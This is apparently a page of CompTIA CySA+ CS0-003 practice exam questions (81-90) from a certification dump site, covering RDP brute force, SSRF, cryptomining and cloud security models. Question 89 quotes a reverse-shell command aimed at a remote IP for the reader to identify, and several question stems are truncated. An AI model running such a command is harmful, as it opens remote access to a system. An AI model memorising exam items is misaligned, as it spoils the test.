New Year Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA CompTIA CySA+ CS0-003 Questions and answers with CertsForce

Viewing page 9 out of 13 pages
Viewing questions 81-90 out of questions
Questions # 81:

In the last hour, a high volume of failed RDP authentication attempts has been logged on a critical server. All of the authentication attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following mitigating controls would be most effective to reduce the rate of success of this brute-force attack? (Select two).

Options:

A.

Increase the granularity of log-on event auditing on all devices.


B.

Enable host firewall rules to block all outbound traffic to TCP port 3389.


C.

Configure user account lockout after a limited number of failed attempts.


D.

Implement a firewall block for the IP address of the remote system.


E.

Install a third-party remote access tool and disable RDP on all devices.


F.

Block inbound to TCP port 3389 from untrusted remote IP addresses at the perimeter firewall.


Expert Solution
Questions # 82:

A security analyst noticed the following entry on a web server log:

Warning: fopen (http://127.0.0.1:16) : failed to open stream:

Connection refused in /hj/var/www/showimage.php on line 7

Which of the following malicious activities was most likely attempted?

Options:

A.

XSS


B.

CSRF


C.

SSRF


D.

RCE


Expert Solution
Questions # 83:

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that crypto mining is occurring. Which of the following indicators would

most likely lead the team to this conclusion?

.

Options:

A.

High GPU utilization


B.

Bandwidth consumption


C.

Unauthorized changes


D.

Unusual traffic spikes


Expert Solution
Questions # 84:

The Chief Information Security Officer wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which of the following should be recommended as a starting point?

Options:

A.

Non-persistent virtual desktop infrastructures


B.

Passwordless authentication


C.

Standard-issue laptops


D.

Serverless workloads


Expert Solution
Questions # 85:

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system

owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to

categorize and prioritize the respective systems?

Options:

A.

Interview the users who access these systems,


B.

Scan the systems to see which vulnerabilities currently exist.


C.

Configure alerts for vendor-specific zero-day exploits.


D.

Determine the asset value of each system.


Expert Solution
Questions # 86:

Which of the following would likely be used to update a dashboard that integrates…..

Options:

A.

Webhooks


B.

Extensible Markup Language


C.

Threat feed combination


D.

JavaScript Object Notation


Expert Solution
Questions # 87:

An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)

Options:

A.

Beaconinq


B.

Domain Name System hijacking


C.

Social engineering attack


D.

On-path attack


E.

Obfuscated links


F.

Address Resolution Protocol poisoning


Expert Solution
Questions # 88:

Which Of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power Plant?

Options:

A.

Containerization


B.

Manual code reviews


C.

Static and dynamic analysis


D.

Formal methods


Expert Solution
Questions # 89:

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

Options:

A.

RCE


B.

Reverse shell


C.

XSS


D.

SQL injection


Expert Solution
Questions # 90:

When undertaking a cloud migration of multiple SaaS application, an organizations system administrator struggled … identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

Options:

A.

CASB


B.

SASE


C.

ZTNA


D.

SWG


Expert Solution
Viewing page 9 out of 13 pages
Viewing questions 81-90 out of questions